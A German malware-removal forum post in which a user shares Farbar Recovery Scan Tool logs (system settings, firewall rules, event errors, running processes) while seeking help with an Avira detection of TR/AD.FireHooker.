SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-950702919-2450676760-769127011-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\sharepoint.com -> hxxps://combs4nvt-files.sharepoint.com
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2018-04-12 01:38 - 2018-04-12 01:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-950702919-2450676760-769127011-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Tamy\Downloads\Bilder\Bilder\Neuer Ordner (3)\0152eb2de96d653836060b2754ef0eb2.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{030D48D8-0797-4E49-B858-E0758C6387E0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{4A3B0BFE-355B-43E1-A895-A0F45DDEA04E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Suicide of Rachel Foster\TSORF.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{14EE9A49-C174-4031-A7F9-15537AFF764B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Suicide of Rachel Foster\TSORF.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{F4EDE0C2-AB33-46AC-8330-4B075006873C}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{965A77BD-43B4-436A-8275-E591F73134FF}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{645BD930-3B27-4C7D-B627-1D6C88061B89}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{8168AAC9-F50C-48C6-97DE-70988A24B3F3}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{F10EA35A-29D0-4152-BB40-924B8409EBEA}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin_LE\TS4.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{E4056FC9-4713-4553-B868-03B545CDC347}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin_LE\TS4.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [UDP Query User{E23C4AF5-BBFD-4304-9DF2-FACED462503F}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [TCP Query User{761E52A8-1100-43BB-8024-22C25A720FB7}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [{1E24983F-A821-47B1-85EE-6DBF5AA484F4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{B4611A1F-9566-412D-B372-F38DF22C3619}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{225B842E-627D-4FCE-81C3-AE5DE9CC638F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{55736684-752F-47A8-934E-F85FB12EC8DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{BB75EDAB-973D-4F9B-A171-5380D523757A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{891D0F7E-DCE0-4090-A346-ECCDBC5C8814}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{D507C8A0-3DA7-4B38-9E5D-A4663886F415}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [{DA2CAECB-6025-4136-901F-0C9C5DFE182B}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\TangentPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{DC548F85-4E0B-4366-9984-2707BC1B6E1C}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\EuphonixPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{850872BA-868F-4D1E-9ACD-25A6ED1CE0A8}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\JLCooperPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{3A2C5ABF-BEE7-462A-89C6-2A3126301305}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DaVinciPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{814B36DF-C514-46C8-8FE3-B14C5CF227D2}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\bmdpaneld.exe () [Datei ist nicht signiert]
FirewallRules: [{E0B64A32-C70F-482B-8E70-128DA5C23218}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [{7E81C17B-2276-43EC-BF07-0D765A5CB996}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{0ABF2F82-E31E-411D-8A11-18814F784E85}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A37732DF-FAB4-420E-A54D-2EAD431FDD00}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{02158A46-93F7-40A9-976F-C7A6B8EB948A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{5F163849-15A9-43DB-B306-96FF8DF36463}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{1D7131E5-C7FD-4C56-9C00-6CC51F940CDC}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [{CE3BCED8-74C1-4B54-955D-73C9AB5209FD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1B2973C1-460E-4647-8935-E50C08C1B84C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{76BAC813-E520-4799-9E99-B659E4208E1D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E73705AA-6EEB-48C5-8AE9-B8557E076728}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{75E54FEE-B187-46B4-8E17-EC8E1E4ED191}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{AEEDAE66-4725-4CA1-B9BB-5D2A76310B36}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [{E86E1885-0869-411E-B2B5-15DF8A5C9A8C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TPH\TPH.exe () [Datei ist nicht signiert]
FirewallRules: [{E43CD189-F465-4F84-B02F-DA079B8CBCEC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TPH\TPH.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{927215D3-13D3-4629-94C1-54AF07C173D5}C:\users\tamy\downloads\mirc\mirc\mirc.exe] => (Block) C:\users\tamy\downloads\mirc\mirc\mirc.exe (mIRC Co. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{8D775FFB-10E3-40BF-8461-A238C513FA75}C:\users\tamy\downloads\mirc\mirc\mirc.exe] => (Block) C:\users\tamy\downloads\mirc\mirc\mirc.exe (mIRC Co. Ltd.) [Datei ist nicht signiert]
FirewallRules: [{CF682FC4-667B-412A-B731-549A2781BBA6}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{BBD5A84F-C65F-4F59-B161-BD2A52F65C3E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{49B6683C-F54A-4540-BA92-94E0E2C847D9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{27DE3267-189F-48B6-A95F-96853314326D}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{BF9F41BF-D6D8-4B81-8996-0740912FD647}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{0D346682-FD29-43C0-8EDE-3D7C1D8855ED}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{10CB5ED3-88E2-491D-B21A-3D946EDB4863}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Sims 3\Game\Bin\Sims3Launcher.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{78A56F30-2B7C-46D3-964B-EB12E1157D66}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Sims 3\Game\Bin\Sims3Launcher.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{39F8BBA7-4338-4C24-99C9-C4CC6317D96C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{FC885D45-0677-4AFE-B7D3-7ACE2B16727E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{13102939-BF52-4115-B690-543543567389}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{1A2F0519-AACA-4CC2-B35C-932C63FFB4F6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{9F661CBA-CF1B-46F0-9014-AB719F458652}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Blackwood Crossing\Blackwood Crossing.exe () [Datei ist nicht signiert]
FirewallRules: [{B95C53EC-CF8A-444A-9827-EB59D1084FA5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Blackwood Crossing\Blackwood Crossing.exe () [Datei ist nicht signiert]
FirewallRules: [{272856DB-6D2F-4A37-A817-A3F84B9DA474}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{1C4F2FCA-6D64-403B-975F-D6E73FAFE751}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{2FE5B42D-0732-49DA-8643-991FFB4FD15C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{F6FF971C-55FD-4544-9308-57A30FC26301}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{64D22DEE-D605-496F-A030-ECB4BC9C1539}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{A7591A5E-F89C-46D2-9571-09C17B225263}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{346C8694-BC30-48EE-A684-8EA1B45ADF83}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{7DDDD07B-1436-49ED-BFC8-467972E1B579}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{AA837FAF-50E2-43EC-A941-9933848A3974}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{DD32840C-2770-4734-95AC-034711557422}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{901461F8-1746-4337-A4ED-6B3DAC239756}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{AF3D1A11-3C7E-4432-B597-1B026073A2E5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{5A557F2F-F3F2-430E-B4DE-D022AC6A5E0B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{AE2409F5-D506-4B85-AC4B-AC6B6DC0CB17}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{2800AF44-11B3-457B-8947-6AE2DA9EDDF1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{7854E954-28BD-468B-858E-8ED359720FF0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{5A85C0F8-7541-4C5E-BEF6-88FEEBF8B916}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{038B2FBE-08E5-4CF1-8288-03BF12FB686A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{6A68D5AA-C920-4CC6-910A-9F7FB75C1123}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Zenimax Online\zosSteamStarter.exe (Zenimax Media Inc. -> Zenimax Online Studios)
FirewallRules: [{8F230B80-A823-482E-9D3B-29AD39378840}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Zenimax Online\zosSteamStarter.exe (Zenimax Media Inc. -> Zenimax Online Studios)
FirewallRules: [{3D2F6897-7F09-4E28-8054-5A1169B255D0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{D26B2ED2-399D-412B-BDE4-FEE079F10EB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{777050EB-0A1C-4824-8921-5A549C4B4206}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe => Keine Datei
FirewallRules: [{1EEAAD22-5CB3-45EC-BAE5-0A5F745914EE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe => Keine Datei
FirewallRules: [{167C91D0-194A-44F4-B63A-D07DC4CF56D9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Morrowind\Morrowind Launcher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{F13FEE40-55CE-4058-A07A-F33EAE1ACE64}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Morrowind\Morrowind Launcher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{27FC6B3B-097C-4BC1-992A-EFDD6DC5C2DB}] => (Block) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei
FirewallRules: [{B30F4C33-ECA1-434C-98F4-997BD09954A4}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei
FirewallRules: [{9A965A18-BE4E-488B-BDB2-E98400D0C5F8}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei

==================== Wiederherstellungspunkte =========================

23-09-2020 17:13:06 Geplanter Prüfpunkt
02-10-2020 10:46:57 Geplanter Prüfpunkt
03-10-2020 21:43:12 Removed 4K Video Downloader 4.8

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (10/03/2020 09:42:14 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (10/03/2020 09:28:22 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (10/02/2020 09:44:24 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (10/01/2020 01:23:23 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf (C:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (09/30/2020 06:39:43 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (09/29/2020 10:22:34 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (09/27/2020 07:31:54 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (09/26/2020 02:54:53 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).


Systemfehler:
=============
Error: (10/02/2020 10:53:25 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Origin Web Helper Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (10/02/2020 10:53:25 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Origin Web Helper Service erreicht.

Error: (10/02/2020 10:38:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Origin Web Helper Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (10/02/2020 10:38:28 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Origin Web Helper Service erreicht.

Error: (10/02/2020 10:35:38 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (10/02/2020 10:35:38 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (09/26/2020 09:14:44 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-QQL9K51)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (09/26/2020 09:14:44 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-QQL9K51)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================

Date: 2020-10-04 11:29:30.5920000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-01 12:02:54.9940000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-09-09 09:09:44.4130000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: American Megatrends Inc. A.90 12/06/2017
Hauptplatine: Micro-Star International Co., Ltd. B350 PC MATE (MS-7A34)
Prozessor: AMD Ryzen 5 1600 Six-Core Processor 
Prozentuale Nutzung des RAM: 25%
Installierter physikalischer RAM: 16336.14 MB
Verfügbarer physikalischer RAM: 12160.58 MB
Summe virtueller Speicher: 18768.14 MB
Verfügbarer virtueller Speicher: 13043.92 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:930.91 GB) (Free:110.94 GB) NTFS

\\?\Volume{cf7b37e2-3cfb-4faf-8e5e-cb9cf918a024}\ (Wiederherstellung) (Fixed) (Total:0.49 GB) (Free:0.05 GB) NTFS
\\?\Volume{a61bd163-d7d8-42ba-b8e6-092c13901f01}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         
__________________

Alt 04.10.2020, 11:48   #4
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



FRST ist mit 125269 Zeichen zu lang. Ich habe es jetzt einmal in der Mitte gesplittet. Ich hoffe, das ist in Ordnung.

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 03-10-2020
durchgeführt von Tamy (Administrator) auf DESKTOP-QQL9K51 (Micro-Star International Co., Ltd. MS-7A34) (04-10-2020 11:39:34)
Gestartet von C:\Users\Tamy\Desktop
Geladene Profile: Tamy
Platform: Windows 10 Pro Version 2004 19041.508 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Geek Software GmbH -> Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe <2>
(Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <6>
(netucate systems GmbH) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\YuLinc_AppShare_PingBack.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Valve -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
